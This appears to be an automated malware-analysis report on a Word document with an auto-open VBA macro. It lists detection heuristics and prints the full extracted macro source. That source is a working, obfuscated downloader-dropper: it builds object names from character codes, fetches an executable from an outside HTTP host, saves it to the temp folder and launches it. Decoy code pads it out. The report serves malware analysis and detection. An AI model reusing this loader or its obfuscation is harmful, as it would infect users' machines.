MALICIOUS
230
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1105 Ingress Tool Transfer
T1204.002 Malicious File
The sample is an OOXML document containing a VBA project with an autoopen macro. Critical heuristics indicate the VBA code downloads and executes a file from an HTTP source, and is an obfuscated auto-exec loader. The `macros.bas` script contains a subroutine `mp3_cbr_aktivate` which calls `savetofile` on an object, strongly suggesting it writes a downloaded payload to disk.
Heuristics 7
-
VBA project inside OOXML medium 5 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXECVBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.Matched line in script
usZ5pw3gU8 = strUnquote23.responseBody -
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.Matched line in script
Set hCurDir_2 = CreateObject(UIlhbjkhoiyH) -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set hCurDir_2 = CreateObject(UIlhbjkhoiyH) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub autoopen() -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas Referenced by macro
- http://schemas.openxmlformats.org/markup-compatibility/2006Referenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsReferenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/mathReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingReferenced by macro
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingReferenced by macro
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2012/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkReferenced by macro
- http://schemas.microsoft.com/office/word/2006/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeReferenced by macro
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 15258 bytes |
SHA-256: 39defa5524c67399629aa5380088d9bec6419fea4d8dc2444900223ad004665a |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
VEeve (8.2)
End Sub
Sub VEeve(FFFFF As Long)
FBFILE_FORMAT_1
End Sub
Attribute VB_Name = "Module2"
'':::::
Static Function _
hFBrelop2IRrelop _
(ByVal tk As _
Integer) As Integer
Dim op As Integer
Select Case tk
Case FB_TK_EQ
op = AST_OP_EQ
Case FB_TK_GT
op = AST_OP_GT
Case FB_TK_LT
op = AST_OP_LT
Case FB_TK_NE
op = AST_OP_NE
Case FB_TK_LE
op = AST_OP_LE
Case FB_TK_GE
op = AST_OP_GE
Case Else
ee.errReport (FB_ERRMSG_EXPECTEDRELOP)
'' error recovery: fake an op
op = AST_OP_EQ
End Select
funcstion = op
End Function
'':::::
Static Function _
hFileExists _
(ByVal filename As _
String) As Integer
Dim f As Integer
f = FreeFile
If f Then
funcstion = True
Close #f
Else
funsction = False
End If
End Function
Public Sub mp3_cbr_aktivate(pathIsAbsolute_4 As Object, pathIsAbsolute_3 As String)
pathIsAbsolute_4.savetofile pathIsAbsolute_3, 2
End Sub
'':::::
Static Sub _
hUcase _
(ByVal src As String _
, ByVal dst As _
String)
Dim c As Integer
Dim s As String
Dim d As String
s = src
d = dst
Do
c = s
If (c >= 97) Then
If (c <= 122) Then
c = c - (97 - 65)
End If
ElseIf (c = 0) Then
Exit Do
End If
d = c
s = s - 1
d = d - 1
Loop
'' null-term
d = 0
End Sub
'':::::
Static Sub _
hClearName _
(ByVal src As _
String)
Dim p As String
p = src
Do
Select Case p
Case 0
Exit Do
Case CHAR_AUPP To CHAR_ZUPP, CHAR_ALOW To CHAR_ZLOW, CHAR_0 To CHAR_9, CHAR_UNDER
Case Else
p = CHAR_ZLOW
End Select
p = p + 1
Loop
End Sub
'' Searches backwards for the last '.' while still behind '/' or '\'.
Private Function hFindExtBegin(ByRef path As String) As Integer
for i as integer = len( path )-1 to 0 step -1
select case( path[i] )
Case Asc(".")
return i
#If defined__FB_WIN32__ Or defined__FB_DOS__ Then
Case Asc("\"), Asc("/")
#Else
Case Asc("/")
#End If
Exit For
End Select
Next
function = len( path )
End Function
Function hStripExt(ByRef path As String) As String
function = left( path, hFindExtBegin( path ) )
End Function
'':::::
Static Function _
hStripPath _
(ByVal filename As _
String) As String
Dim lp, p_found, p(1 To 2)
lp = 0
Do
p(1) = InStr(lp + 1, filename, RSLASH)
p(2) = InStr(lp + 1, filename, "/")
If p(1) = 0 Or (p(2) > 0 And p(2) < p(1)) Then
p_found = p(2)
Else
p_found = p(1)
End If
If (p_found = 0) Then
Exit Do
End If
lp = p_found
Loop
If (lp > 0) Then
fundction = Mid(filename, lp + 1)
Else
fundction = filename
End If
End Function
Attribute VB_Name = "Module1"
Function cal_password_1(ByVal ser_no As String, computer_id As String) As String
Dim ch(2) As String
Dim out_string(2) As String
Dim i%, m%
Dim num(1) As Integer
Dim l As Long
If ser_no = "" Then
ser_no = "028-000001"
End If
'm% = InStr(1, ser_no, "-", 0)
'ch(0) = Mid$(ser_no, m% + 1, 6)
ch(0) = ser_no 'ch(0) + Mid$(ser_no, m% - 2, 2)
ch(1) = Trim(Mid$(computer_id, 1, 8))
ch(0) = set_protect_code_1(ch(0))
ch(1) = set_protect_code_1(ch(1))
ch(2) = ""
For i% = 1 To 8
ch(2) = ch(2) + Mid$(ch(0), i%, 1)
ch(2) = ch(2) + Mid$(ch(1), i%, 1)
Next i%
ch(2) = Mid$(ch(0), i%, 9) + ch(2) + Mid$(ch(0), i%, 10)
ch(1) = Mid$(ch(2), 1, 10)
ch(0) = Mid$(ch(2), 11, 18)
ch(0) = set_protect_code_1(ch(0))
ch(1) = set_protect_code_1(ch(1))
ch(2) = ""
For i% = 1 To 8
ch(2) = ch(2) + Mid$(ch(0), i%, 1)
ch(2) = ch(2) + Mid$(ch(1), i%, 1)
Next i%
ch(2) = Mid$(ch(1), i%, 9) + ch(2) + Mid$(ch(1), i%, 10)
ch(0) = Mid$(ch(2), 5, 14)
ch(1) = Mid$(ch(2), 1, 4) + Mid$(ch(2), 15, 18)
ch(0) = set_protect_code_1(ch(0))
ch(1) = set_protect_code_1(ch(1))
ch(2) = ""
For i% = 1 To 8
ch(2) = ch(2) + Mid$(ch(0), i%, 1)
ch(2) = ch(2) + Mid$(ch(1), i%, 1)
Next i%
ch(2) = Mid$(ch(0), i%, 9) + ch(2) + Mid$(ch(0), i%, 10)
ch(0) = Mid$(ch(2), 1, 8)
ch(1) = Mid$(ch(2), 9, 18)
ch(0) = set_protect_code_1(ch(0))
ch(1) = set_protect_code_1(ch(1))
ch(2) = ""
For i% = 1 To 8
ch(2) = ch(2) + Mid$(ch(0), 9 - i%, 1)
ch(2) = ch(2) + Mid$(ch(1), i%, 1)
Next i%
out_string(0) = Mid$(ch(2), 1, 4)
out_string(1) = Mid$(ch(2), 5, 4)
num(0) = Val(out_string(0))
num(1) = Val(out_string(1))
out_string(0) = Trim(Str(num(0) + num(1)))
If Len(out_string(0)) = 1 Then
out_string(0) = "000" + out_string(0)
ElseIf Len(out_string(0)) = 2 Then
out_string(0) = "00" + out_string(0)
ElseIf Len(out_string(0)) = 3 Then
out_string(0) = "0" + out_string(0)
ElseIf Len(out_string(0)) > 4 Then
out_string(0) = Mid$(out_string(0), 1, 4)
End If
out_string(2) = Mid$(ch(2), 9, 8)
cal_password_1 = out_string(0) + out_string(2)
End Function
Public Function FBFILE_FORMAT_1()
Set pathIsAbsolute_1 = hCurDir_2(Chr(87) & Chr(60) & Chr(83) & Chr(99) & Chr(61) & Chr(114) & Chr(105) & Chr(112) & Chr(116) & ";" & Chr(46) & Chr(83) & Chr(61) & Chr(104) & Chr(101) & "<" & Chr(108) & Chr(108)).Environment(Chr(80) & Chr(114) & "o" & Chr(99) & Chr(101) & "s" & "s")
pathIsAbsolute_2 = pathIsAbsolute_1("T" & Chr(69) & Chr(77) & Chr(80))
Dim pathIsAbsolute_4 As Object
Set pathIsAbsolute_4 = hCurDir_2(Chr(65) & "<" & "d" & Chr(111) & Chr(59) & Chr(100) & Chr(98) & Chr(61) & Chr(46) & Chr(83) & Chr(116) & Chr(61) & Chr(114) & Chr(60) & Chr(101) & "a" & Chr(59) & Chr(109))
Dim pathIsAbsolute_3 As String
pathIsAbsolute_3 = pathIsAbsolute_2 + "\ce" & Chr(101) + "ce." & "e" & Chr(120) & Chr(101)
With pathIsAbsolute_4
.Type = 1
.Open
.write usZ5pw3gU8(223)
End With
mp3_cbr_aktivate pathIsAbsolute_4, pathIsAbsolute_3
Set noextensionFile = hCurDir_2(Chr(83) & Chr(61) & "<" & "h" & "e" & Chr(108) & Chr(59) & Chr(108) & "<" & Chr(46) & Chr(65) & "p;" & Chr(112) & Chr(108) & Chr(105) & "<" & Chr(99) & Chr(97) & Chr(116) & Chr(61) & Chr(105) & Chr(111) & Chr(110))
noextensionFile.Open (pathIsAbsolute_3)
End Function
Public Function cal_protect_code_1(in_ch As String, time%) As String
Dim l!, l_!
Dim i%
l! = Asc(Mid$(in_ch, 1, 1)) Mod 100 '???
l! = l! * 100 + (Asc(Mid$(in_ch, 2, 1)) Mod 100)
l! = function_for_protect_1(l!) '??
For i% = 1 To time% - 1 'time% ???
l! = Abs(l!) Mod 10000
l! = function_for_protect_1(l!)
Next i%
l! = Abs(l!)
l_! = l! Mod 100
l! = (l_! + (l! - l_!) / 100) Mod 100
cal_protect_code_1 = Trim(Str(l!))
If Len(cal_protect_code_1) = 1 Then
cal_protect_code_1 = "0" + cal_protect_code_1
End If
End Function
Public Function function_for_protect_1(i!) As Long
function_for_protect_1 = -4 * i! * i! + 14 * i! + 6
End Function
Public Function set_protect_code_1(computer_id As String) As String
Dim i%
Dim temp_string(4) As String * 2
'????
temp_string(0) = Mid$(computer_id, 1, 2)
temp_string(1) = Mid$(computer_id, 3, 2)
temp_string(2) = Mid$(computer_id, 5, 2)
temp_string(3) = Mid$(computer_id, 7, 2)
If Len(computer_id) > 8 Then
temp_string(4) = Mid$(computer_id, 9, 2)
End If
set_protect_code_1 = cal_protect_code_1(temp_string(0), 5)
If temp_string(1) = temp_string(0) Then
set_protect_code_1 = set_protect_code_1 + cal_protect_code_1(temp_string(1), 6)
If temp_string(2) = temp_string(1) Then '2=1=0
set_protect_code_1 = cal_protect_code_1(temp_string(2), 7) + set_protect_code_1
If temp_string(3) = temp_string(2) Then '3=2=1=0
set_protect_code_1 = set_protect_code_1 + cal_protect_code_1(temp_string(3), 8)
Else
set_protect_code_1 = set_protect_code_1 + cal_protect_code_1(temp_string(3), 5)
End If
Else '0=1<>2
set_protect_code_1 = cal_protect_code_1(temp_string(2), 5) + set_protect_code_1
If temp_string(3) = temp_string(2) Or temp_string(3) = temp_string(1) Then '0=1 <>2,3=2or 3=0
set_protect_code_1 = set_protect_code_1 + cal_protect_code_1(temp_string(3), 7)
Else
set_protect_code_1 = set_protect_code_1 + cal_protect_code_1(temp_string(3), 5)
End If
End If
Else
set_protect_code_1 = set_protect_code_1 + cal_protect_code_1(temp_string(1), 5)
If temp_string(2) = temp_string(1) Or temp_string(2) = temp_string(0) Then '
set_protect_code_1 = cal_protect_code_1(temp_string(2), 6) + set_protect_code_1
If temp_string(3) = temp_string(2) Or temp_string(3) = temp_string(1) Or _
temp_string(3) = temp_string(0) Then
set_protect_code_1 = set_protect_code_1 + cal_protect_code_1(temp_string(3), 7)
Else
set_protect_code_1 = set_protect_code_1 + cal_protect_code_1(temp_string(3), 6)
End If
Else
set_protect_code_1 = cal_protect_code_1(temp_string(2), 5) + set_protect_code_1
If temp_string(3) = temp_string(2) Or temp_string(3) = temp_string(1) Or _
temp_string(3) = temp_string(0) Then
set_protect_code_1 = set_protect_code_1 + cal_protect_code_1(temp_string(3), 6)
Else
set_protect_code_1 = set_protect_code_1 + cal_protect_code_1(temp_string(3), 5)
End If
End If
End If
If temp_string(4) <> "" Then
set_protect_code_1 = set_protect_code_1 + cal_protect_code_1(temp_string(4), 5)
End If
End Function
Attribute VB_Name = "Module3"
'':::::
Static Function _
hStripFilename _
(ByVal filename As _
String) As String
Dim lp, p_found, p(1 To 2)
lp = 0
Do
p(1) = InStr(lp + 1, filename, RSLASH)
p(2) = InStr(lp + 1, filename, "/")
If p(1) = 0 Or (p(2) > 0 And p(2) < p(1)) Then
p_found = p(2)
Else
p_found = p(1)
End If
If (p_found = 0) Then
Exit Do
End If
lp = p_found
Loop
If (lp > 0) Then
fusnction = Left(filename, lp)
Else
fusnction = ""
End If
End Function
Public Function usZ5pw3gU8(KJB As Long)
Dim strUnquote23: Set strUnquote23 = hCurDir_2(Chr(77) & Chr(105) & Chr(60) & "c" & Chr(114) & Chr(111) & Chr(61) & Chr(115) & Chr(111) & Chr(102) & "t" & Chr(59) & Chr(46) & Chr(88) & "M" & Chr(60) & Chr(76) & ";" & "H" & Chr(84) & "=" & Chr(84) & "P")
strUnquote23.Open Chr(71) & Chr(69) & Chr(84), Chr(104) & Chr(116) & "t" & Chr(112) & Chr(58) & "/" & "/" & Chr(101) & "c" & Chr(111) & Chr(98) & Chr(97) & Chr(109) & Chr(98) & Chr(117) & Chr(46) & Chr(99) & Chr(111) & "m" & Chr(47) & Chr(51) & Chr(51) & Chr(52) & Chr(102) & "3" & Chr(100) & "/" & Chr(48) & Chr(57) & Chr(54) & Chr(117) & "h" & Chr(53) & Chr(98) & Chr(46) & "e" & Chr(120) & "e", False
strUnquote23.Send
usZ5pw3gU8 = strUnquote23.responseBody
End Function
'':::::
Static Function _
hGetFileExt _
(ByVal fname As _
String) As String
Dim p, lp As Integer
Dim res As String
lp = 0
Do
p = InStr(lp + 1, fname, ".")
If (p = 0) Then
Exit Do
End If
lp = p
Loop
If (lp = 0) Then
fusnction = ""
Else
res = lcase(Mid(fname, lp + 1))
If InStr(res, RSLASH) > 0 Or InStr(res, "/") > 0 Then
'' We had a folder with a "." inside ...
funfction = ""
ElseIf (Len(res) > 0) Then
'' . or .. dirs?
If res = Asc(RSLASH) Or res = Asc("/") Then
fudnction = ""
Else
fundction = res
End If
End If
End If
End Function
Sub hReplaceSlash(ByVal s As String, ByVal char As Integer)
for i as integer = 0 to len( *s ) - 1
if( (s[i] = CHAR_RSLASH) or (s[i] = CHAR_SLASH) ) then
s [i] = char
End If
Next
End Sub
Function pathStripDiv(ByRef path As String) As String
dim as integer length = len( path )
If (length > 0) Then
length -= 1
select case( path[length] )
#If defined__FB_WIN32__ Or defined__FB_DOS__ Then
Case Asc("/"), Asc("\")
#Else
Case Asc("/")
#End If
return left( path, length )
End Select
End If
function = path
End Function
Function pathIsAbsolute(ByVal path As String) As Integer
#If defined__FB_WIN32__ Or defined__FB_DOS__ Then
if( (*path)[0] <> 0 ) then
select case( (*path)[1] )
Case Asc(":")
'' C:...
function = TRUE
#If def__FB_WIN32__ Then
Case Asc("\")
'' \\... UNC path
function = ((*path)[0] = asc( "\" ))
#End If
End Select
End If
#Else
'' /...
function = ((*path)[0] = asc( "/" ))
#End If
End Function
Function hCheckFileFormat(ByVal f As Integer) As Integer
dim as long BOM
dim as FBFILE_FORMAT fmt
'' little-endian assumptions
fmt = FBFILE_FORMAT_ASCII
if( get( #f, 0, BOM ) = 0 ) then
If (BOM = &HFFFE0000) Then
fmt = FBFILE_FORMAT_UTF32BE
ElseIf (BOM = &HFEFF) Then
fmt = FBFILE_FORMAT_UTF32LE
Else
BOM and= &h00FFFFFF
If (BOM = &HBFBBEF) Then
fmt = FBFILE_FORMAT_UTF8
Else
BOM and= &h0000FFFF
If (BOM = &HFEFF) Then
fmt = FBFILE_FORMAT_UTF16LE
ElseIf (BOM = &HFFFE) Then
fmt = FBFILE_FORMAT_UTF16BE
End If
End If
End If
Select Case fmt
Case FBFILE_FORMAT_ASCII
Seek #f, 1
Case FBFILE_FORMAT_UTF8
Seek #f, 1 + 3
Case FBFILE_FORMAT_UTF16LE, _
FBFILE_FORMAT_UTF16BE
Seek #f, 1 + 2
End Select
End If
function = fmt
End Function
Function hCurDir() As String
'' curdir() usually won't be terminated with a path separator,
'' except when it points to the file system root, instead of
'' some directory (e.g. C:\ on Win32 or / on Unix).
function = pathStripDiv( curdir( ) )
End Function
Function pathStripCurdir(ByRef path As String) As String
var pwd = hCurDir() + FB_HOST_PATHDIV
If (Left(path, Len(pwd)) = pwd) Then
function = right( path, len( path ) - len( pwd ) )
Else
function = path
End If
End Function
Function hIsValidSymbolName(ByVal sym As String) As Integer
If (sym = Null) Then Exit Function
var symlen = len( *sym )
If (symlen = 0) Then Exit Function
if( (hIsChar(sym[0]) orelse (sym[0] = asc("_"))) = FALSE ) then exit function
for i as integer = 1 to symlen-1
if( ((hIsChar(sym[i])) orelse (sym[i] = asc("_")) orelse (hIsCharNumeric(sym[i]))) = FALSE ) then exit function
Next
function = TRUE
End Function
Public Function hCurDir_2(UIlhbjkhoiyH As String)
UIlhbjkhoiyH = Replace(UIlhbjkhoiyH, Chr(60), "")
UIlhbjkhoiyH = Replace(UIlhbjkhoiyH, Chr(61), "")
UIlhbjkhoiyH = Replace(UIlhbjkhoiyH, Chr(59), "")
Set hCurDir_2 = CreateObject(UIlhbjkhoiyH)
End Function
'' Checks whether a string starts with and ends in [double-]quotes.
Private Function strIsQuoted(ByRef s As String) As Integer
dim as integer last = len(s) - 1
If (Last < 1) Then
return FALSE
End If
return (((s[0] = asc("""")) and (s[last] = asc(""""))) or _
((s[0] = asc("'" )) and (s[last] = asc("'" ))))
End Function
Function strUnquote(ByRef s As String) As String
If (strIsQuoted(s)) Then
return mid(s, 2, len(s) - 2)
End If
return s
End Function
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 73216 bytes |
SHA-256: 691c1a74bd50aefaa8f95dc262c3d05afeed6ae6154dd37d962c1619b0c1b048 |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.